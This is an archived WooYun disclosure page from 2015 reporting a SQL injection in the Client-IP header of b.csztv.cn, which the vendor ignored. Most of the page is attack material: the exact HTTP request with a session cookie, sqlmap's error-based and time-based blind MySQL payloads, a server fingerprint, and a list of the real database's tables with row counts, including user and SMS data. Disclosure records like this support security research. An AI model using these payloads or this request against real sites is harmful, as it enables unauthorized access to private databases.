乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-09: 细节已通知厂商并且等待厂商处理中 2015-12-14: 厂商已经主动忽略漏洞,细节向公众公开
GET /px/pollOk/21 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Client-IP: *Cookie: ci_session=0PTBypVyreZMiVM%2BSl1EqGS5VxaVrY2YuuUQNlnd9Gia8PNb7LCZE%2BKA9HZi4I48DGa0xcMc5HSK%2BAQhUf3022rwCzRQGMv1L2%2BPuzNaD6mUJLOJznkRGD4RTcXkhulRt1oCUqhhuEAx39N8w3g%2BNm3plwQ2AAZJs%2BUGLbQY8wcn49RgXINMzT3DuruRfhAkqXrrd%2F8w%2B0%2B%2BlApy2WIy5wv55PoY39r6RM1oCQg0Xi2NFiUwynb5c3FxL5YPyrVih3Id%2FgTAEKyKF3B9X0vng%2FZDWQ7QuUzptSBLRidWrZDcRD1R1y09Fr00%2Fh%2BbwnLyIJqCZlmiQAEE4QY7AskI0g%3D%3DHost: b.csztv.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*
sqlmap resumed the following injection point(s) from stored session:---Parameter: Client-IP #1* ((custom) HEADER) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: ' AND (SELECT 9211 FROM(SELECT COUNT(*),CONCAT(0x717a707871,(SELECT (ELT(9211=9211,1))),0x716a787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'FWRl'='FWRl Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: ' AND (SELECT * FROM (SELECT(SLEEP(5)))WjIN) AND 'caKC'='caKC---web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)web application technology: Apache 2.2.22, PHP 5.3.10back-end DBMS: MySQL 5.0Database: bang+----------------------+---------+| Table | Entries |+----------------------+---------+| bang_poll_info | 1962678 || bang_user_action | 289342 || bang_smsinfo_back | 210640 || bang_hostip | 144757 || bang_capta | 121454 || test_test | 69865 || att_log_his | 56622 || bang_user | 47830 || bang_sessions | 38756 || bang_page_result | 30360 || att_usertask | 26403 || att_task | 26361 || bang_poll_infot | 18876 || wy_vote | 16897 || wy_capta | 16492 || att_daka_his | 12639 || bang_phone | 7299 || bang_page_option | 6362 || att_daka_detail_his | 5782 || bang_phone_tamp | 5145 || bang_option_his | 4804 || bang_rank_news | 3432 || bang_page_option_bak | 3357 || bang_page_option_old | 3037 || bang_news | 1347 || bang_page_title | 1156 || bang_candidate | 918 || intorder | 405 || bang_tjinfo | 309 || qauserinfo | 279 || host_news | 237 || host13_news | 186 || bang_sign | 182 || bang_survey | 154 || contable | 135 || torder | 135 || adcenter | 126 || trade | 89 || bang_poster | 77 || att_leave | 39 || bang_poll | 34 || att_members | 17 || bang_changelog | 10 || class | 8 || yd_members | 8 || poster | 7 || range | 7 || bang_rank_trade | 6 || bang_tjtype | 6 || host_image | 6 || bang_action_prize | 5 || att_train | 2 || bang_event | 2 || userinfo | 2 || att_train_user | 1 || wy_action | 1 |+----------------------+---------+
危害等级:无影响厂商忽略
忽略时间:2015-12-14 15:18
漏洞Rank:4 (WooYun评价)
暂无